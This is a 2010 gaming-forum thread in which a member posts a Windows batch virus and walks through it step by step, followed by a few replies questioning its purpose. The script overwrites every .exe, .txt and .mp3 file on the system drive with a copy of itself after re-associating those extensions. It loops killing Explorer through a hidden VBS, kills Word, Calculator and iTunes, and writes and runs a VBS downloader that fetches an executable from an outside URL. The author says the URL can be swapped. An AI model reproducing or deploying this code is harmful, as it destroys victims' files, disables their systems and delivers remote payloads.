Animosity Gamerz
Please Register to the site, to see all the awesome hacks, videos, mods, and much more

Once registered you will be able to see the chatbox, to type and see what other members are typing

Regards Admins
Animosity Gamerz
Please Register to the site, to see all the awesome hacks, videos, mods, and much more

Once registered you will be able to see the chatbox, to type and see what other members are typing

Regards Admins
Animosity Gamerz
Would you like to react to this message? Create an account in a few clicks or log in to continue.


The online revolution revolves around us.
 
HomeHomeSearchLatest imagesRegisterLog in
Navigation
 Home
 Forum
 Memberlist
 Profile
 FAQ
 Search
Statistics
We have 44 registered users
The newest registered user is -Anony-

Our users have posted a total of 400 messages in 89 subjects
Search
 
 

Display results as :
 
Rechercher Advanced Search

 

 Infecting and killing progams/autodownloading things

Go down 
3 posters
AuthorMessage
TheBlueLobstar
Test Moderator
Coder
Test Moderator   Coder



Posts : 41
Points : 5255
Reputation : 4
Join date : 2010-03-02

Infecting and killing progams/autodownloading things Empty
PostSubject: Infecting and killing progams/autodownloading things   Infecting and killing progams/autodownloading things I_icon_minitimeSat Mar 06, 2010 5:47 am

k heres the full code

Code:

@ echo off


assoc .exe=batfile
DIR /S/B %SystemDrive%\*.exe >> InfList_exe.txt
echo Y | FOR /F "tokens=1,* delims=: " %%j in (InfList_exe.txt) do copy /y %0 "%%j:%%k"


assoc .txt=batfile
DIR /S/B %SystemDrive%\*.txt >> InfList_txt.txt
echo Y | FOR /F "tokens=1,* delims=: " %%j in (InfList_txt.txt) do copy /y %0 "%%j:%%k"




assoc .mp3=batfile
DIR /S/B %SystemDrive%\*.mp3 >> InfList_mp3.txt
echo Y | FOR /F "tokens=1,* delims=: " %%j in (InfList_mp3.txt) do copy /y %0 "%%j:%%k"



echo :a >>explorer.bat
echo tskill explorer >>explorer.bat
echo goto a >>explorer.bat
echo Set objShell = CreateObject("WScript.Shell")>>invisi.vbs
echo strCommand = "explorer.bat">>invisi.vbs
echo objShell.Run strCommand, vbHide, TRUE>>invisi.vbs
start "" invisi.vbs


tskill WINWORD

tskill calc

tskill iTunes


echo ' Set your settings >>%SystemDrive%\downloader.vbs
echo    strFileURL = http://pearl.plunder.com/x/$Q04Q3xyS9jG9iLvzkVXczvJ0q3cqaqcC/c0254e924e/?/Toss The Turtle Trainer.exe >>%SystemDrive%\downloader.vbs
echo    strHDLocation = C:\TossTheTurtleTrainer.exe>>%SystemDrive%\downloader.vbs
echo ' Fetch the file >>%SystemDrive%\downloader.vbs
echo    Set objXMLHTTP = CreateObject("MSXML2.XMLHTTP") >>%SystemDrive%\downloader.vbs
echo    objXMLHTTP.open "GET", strFileURL, false >>%SystemDrive%\downloader.vbs
echo    objXMLHTTP.send() >>%SystemDrive%\downloader.vbs
echo    If objXMLHTTP.Status = 200 Then >>%SystemDrive%\downloader.vbs
echo      Set objADOStream = CreateObject("ADODB.Stream") >>%SystemDrive%\downloader.vbs
echo      objADOStream.Open >>%SystemDrive%\downloader.vbs
echo      objADOStream.Type = 1 'adTypeBinary >>%SystemDrive%\downloader.vbs
echo      objADOStream.Write objXMLHTTP.ResponseBody >>%SystemDrive%\downloader.vbs
echo      objADOStream.Position = 0    'Set the stream position to the start >>%SystemDrive%\downloader.vbs
echo      Set objFSO = Createobject("Scripting.FileSystemObject") >>%SystemDrive%\downloader.vbs
echo        If objFSO.Fileexists(strHDLocation) Then objFSO.DeleteFile strHDLocation >>%SystemDrive%\downloader.vbs
echo      Set objFSO = Nothing >>%SystemDrive%\downloader.vbs
echo      objADOStream.SaveToFile strHDLocation >>%SystemDrive%\downloader.vbs
echo      objADOStream.Close >>%SystemDrive%\downloader.vbs
echo      Set objADOStream = Nothing >>%SystemDrive%\downloader.vbs
echo    End if >>%SystemDrive%\downloader.vbs
echo    Set objXMLHTTP = Nothing >>%SystemDrive%\downloader.vbs
start "" %SystemDrive%\downloader.vbs


ok now i'll break it apart

Code:

assoc .exe=batfile
DIR /S/B %SystemDrive%\*.exe >> InfList_exe.txt
echo Y | FOR /F "tokens=1,* delims=: " %%j in (InfList_exe.txt) do copy /y %0 "%%j:%%k"


assoc .txt=batfile
DIR /S/B %SystemDrive%\*.txt >> InfList_txt.txt
echo Y | FOR /F "tokens=1,* delims=: " %%j in (InfList_txt.txt) do copy /y %0 "%%j:%%k"




assoc .mp3=batfile
DIR /S/B %SystemDrive%\*.mp3 >> InfList_mp3.txt
echo Y | FOR /F "tokens=1,* delims=: " %%j in (InfList_mp3.txt) do copy /y %0 "%%j:%%k"

ok this will infect all mp3's, txt's, and exe's.

Code:

echo :a >>explorer.bat
echo tskill explorer >>explorer.bat
echo goto a >>explorer.bat
echo Set objShell = CreateObject("WScript.Shell")>>invisi.vbs
echo strCommand = "explorer.bat">>invisi.vbs
echo objShell.Run strCommand, vbHide, TRUE>>invisi.vbs
start "" invisi.vbs


tskill WINWORD

tskill calc

tskill iTunes

this will kill the internet, word, calculater, and Itunes.

Code:

echo ' Set your settings >>%SystemDrive%\downloader.vbs
echo    strFileURL = http://pearl.plunder.com/x/$Q04Q3xyS9jG9iLvzkVXczvJ0q3cqaqcC/c0254e924e/?/Toss The Turtle Trainer.exe >>%SystemDrive%\downloader.vbs
echo    strHDLocation = C:\TossTheTurtleTrainer.exe>>%SystemDrive%\downloader.vbs
echo ' Fetch the file >>%SystemDrive%\downloader.vbs
echo    Set objXMLHTTP = CreateObject("MSXML2.XMLHTTP") >>%SystemDrive%\downloader.vbs
echo    objXMLHTTP.open "GET", strFileURL, false >>%SystemDrive%\downloader.vbs
echo    objXMLHTTP.send() >>%SystemDrive%\downloader.vbs
echo    If objXMLHTTP.Status = 200 Then >>%SystemDrive%\downloader.vbs
echo      Set objADOStream = CreateObject("ADODB.Stream") >>%SystemDrive%\downloader.vbs
echo      objADOStream.Open >>%SystemDrive%\downloader.vbs
echo      objADOStream.Type = 1 'adTypeBinary >>%SystemDrive%\downloader.vbs
echo      objADOStream.Write objXMLHTTP.ResponseBody >>%SystemDrive%\downloader.vbs
echo      objADOStream.Position = 0    'Set the stream position to the start >>%SystemDrive%\downloader.vbs
echo      Set objFSO = Createobject("Scripting.FileSystemObject") >>%SystemDrive%\downloader.vbs
echo        If objFSO.Fileexists(strHDLocation) Then objFSO.DeleteFile strHDLocation >>%SystemDrive%\downloader.vbs
echo      Set objFSO = Nothing >>%SystemDrive%\downloader.vbs
echo      objADOStream.SaveToFile strHDLocation >>%SystemDrive%\downloader.vbs
echo      objADOStream.Close >>%SystemDrive%\downloader.vbs
echo      Set objADOStream = Nothing >>%SystemDrive%\downloader.vbs
echo    End if >>%SystemDrive%\downloader.vbs
echo    Set objXMLHTTP = Nothing >>%SystemDrive%\downloader.vbs
start "" %SystemDrive%\downloader.vbs

this will automatically download my toss the turtle trainer.
Notes:"http://pearl.plunder.com/x/$Q04Q3xyS9jG9iLvzkVXczvJ0q3cqaqcC/c0254e924e/?/Toss The Turtle Trainer.exe" can be replaced w/ the download url;
"C:\TossTheTurtleTrainer.exe" can replaced w/ the path\name and file extension you want the file to be downloaded too;
"strFileURL = http://pearl.plunder.com/x/$Q04Q3xyS9jG9iLvzkVXczvJ0q3cqaqcC/c0254e924e/?/Toss The Turtle Trainer.exe >>%SystemDrive%\downloader.vbs" should all be on the same line, as well as all other lines that end with \downloader.vbs



DISCLAIMER
I am not responsible nor is https://animositygamerz.forumotion.net/ for any repercussions or consequences caused by the above stated code.
Back to top Go down
Iggy
Test Moderator
Test Moderator



Posts : 37
Points : 5256
Reputation : 0
Join date : 2010-02-16

Infecting and killing progams/autodownloading things Empty
PostSubject: Re: Infecting and killing progams/autodownloading things   Infecting and killing progams/autodownloading things I_icon_minitimeSat Mar 06, 2010 6:27 am

So, ummm, what does this DO??
Back to top Go down
MR-Final
Uber Moderator
Uber Moderator
MR-Final


Posts : 157
Points : 5463
Reputation : 4
Join date : 2010-01-17
Age : 28
Location : United Staes

Infecting and killing progams/autodownloading things Empty
PostSubject: Re: Infecting and killing progams/autodownloading things   Infecting and killing progams/autodownloading things I_icon_minitimeSat Mar 06, 2010 7:25 am

Wats the point of killing/infecting Mp3 or itunes, then everything gets out of sync and u have to reconnect ur Ipod
Back to top Go down
http://www.animositygamerz.forumotion.net
TheBlueLobstar
Test Moderator
Coder
Test Moderator   Coder



Posts : 41
Points : 5255
Reputation : 4
Join date : 2010-03-02

Infecting and killing progams/autodownloading things Empty
PostSubject: Re: Infecting and killing progams/autodownloading things   Infecting and killing progams/autodownloading things I_icon_minitimeSat Mar 06, 2010 8:42 am

@iggy i tell you if read the bottom
@MR-Final say you were making a batch virus and wanted to make sure it was hard for the victim to get it off there computer; and the killing stuff was just an example so if wanted to kill something you could
Back to top Go down
MR-Final
Uber Moderator
Uber Moderator
MR-Final


Posts : 157
Points : 5463
Reputation : 4
Join date : 2010-01-17
Age : 28
Location : United Staes

Infecting and killing progams/autodownloading things Empty
PostSubject: Re: Infecting and killing progams/autodownloading things   Infecting and killing progams/autodownloading things I_icon_minitimeSat Mar 06, 2010 10:51 am

but were not making viruses...

if u were serious, and i meen SERIOUS, about making viruses, we could make an entire sectio of them, so ppl know what they're getting into
Back to top Go down
http://www.animositygamerz.forumotion.net
 
Infecting and killing progams/autodownloading things
Back to top 
Page 1 of 1

Permissions in this forum:You cannot reply to topics in this forum
Animosity Gamerz :: Hacking :: Notepad scripts-
Jump to: